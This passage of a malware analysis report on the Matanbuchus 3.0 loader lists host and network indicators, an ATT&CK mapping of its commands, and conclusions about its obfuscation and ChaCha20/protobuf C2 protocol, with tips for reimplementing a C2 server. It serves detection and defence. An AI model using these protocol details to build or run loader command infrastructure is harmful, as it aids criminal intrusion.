HTTPS POST (port 443)	Protocol	All C2 traffic uses encrypted HTTPS POST
300-second interval	Behavior	Regular polling beacon with 5-minute interval

7.2 Host Indicators

Indicator	Type	Description
77a53dc…07ba	SHA256	Sample file hash
PE32 DLL, ~59 MB	File Property	Abnormally large DLL (size inflation)
Start export	Export	Execution entry point
rundll32.exe Start	Process	Expected execution method
0x1011A160–0x1011A220	Memory	Opaque predicate globals (if scanning memory)
WinHTTP API usage	API	Uses WinHTTP (not WinINet) for C2 communication

7.3 MITRE ATT&CK Mapping

Technique ID	Name	Description
T1059.001	PowerShell	Command 10: Execute PowerShell scripts
T1059.003	Windows Command Shell	Command 9: Execute cmd.exe commands
T1047	WMI	Command 11: Execute WMI queries
T1055.012	Process Hollowing	Command 1 mode 2: Process hollowing for EXE execution
T1218.007	Msiexec	Command 3: MSI package installation
T1106	Native API	Dynamic API resolution via MurmurHash3
T1027	Obfuscated Files or Information	7 obfuscation techniques including ChaCha20 string encryption
T1027.001	Binary Padding	57.7 MB .data section inflation
T1140	Deobfuscate/Decode	Runtime string decryption and API resolution
T1082	System Information Discovery	Registration beacon collects OS, CPU, RAM, AV info
T1057	Process Discovery	Command 5: Enumerate running processes
T1007	System Service Discovery	Command 6: Enumerate Windows services
T1518	Software Discovery	Command 7: Enumerate installed applications
T1071.001	Web Protocols	HTTPS POST for C2 communication
T1573.001	Symmetric Cryptography	ChaCha20 encryption for C2 traffic
T1132.001	Standard Encoding	Protocol Buffers (nanopb) for message serialization

8. Conclusion

Matanbuchus 3.0 represents a mature and actively maintained loader-as-a-service offering that demonstrates significant investment in anti-analysis capabilities. The seven-layer obfuscation scheme—anchored by a system of 34 mutable opaque predicate globals with cascading write-back mutation, aggressive dead store injection exceeding 90% code volume in critical functions, and environment-dependent predicate seeding via junk API calls—represents a substantial barrier to efficient reverse engineering. An unprepared analyst could easily spend hours navigating thousands of lines of decompiled pseudocode before realizing that the vast majority of it serves no operational purpose.

Beneath the obfuscation, however, the underlying C2 protocol is pragmatic and well-structured. The combination of ChaCha20 stream encryption (without authentication), nanopb protobuf serialization, and a clean REST-like endpoint scheme over HTTPS makes the protocol straightforward to reimplement once the obfuscation is stripped away. The absence of a Poly1305 MAC means that encrypted payloads can be tampered with in transit without detection, and the use of a single static ChaCha20 key and nonce for all string encryption creates a single point of failure for the entire string obfuscation layer—recovery of these 44 bytes unlocks every encrypted string in the binary.

The successful development and live validation of our C2 server simulator serves as definitive proof that the Matanbuchus 3.0 protocol can be fully replicated by defenders. This capability opens several avenues for threat intelligence teams: controlled detonation and behavioral analysis of samples without relying on active criminal infrastructure, extraction of secondary payloads for further analysis, and generation of high-fidelity network signatures based on observed traffic patterns. We hope this report and its accompanying tooling provide a useful resource for the security community in understanding and defending against this persistent threat.

Key takeaways:

Focus on function calls to trace real logic — approximately 90% of decompiled code is obfuscation noise. Identifying the ~10% of meaningful code is the critical first step.
The C2 framing is asymmetric — client sends a 4-byte length prefix, server does not. Missing this detail will break any C2 server implementation.
Task responses are NOT wrapped in OuterWrapper — they are parsed directly as TaskResponse protobuf. Registration and results use OuterWrapper, but task polling responses do not.

Twitter Facebook LinkedIn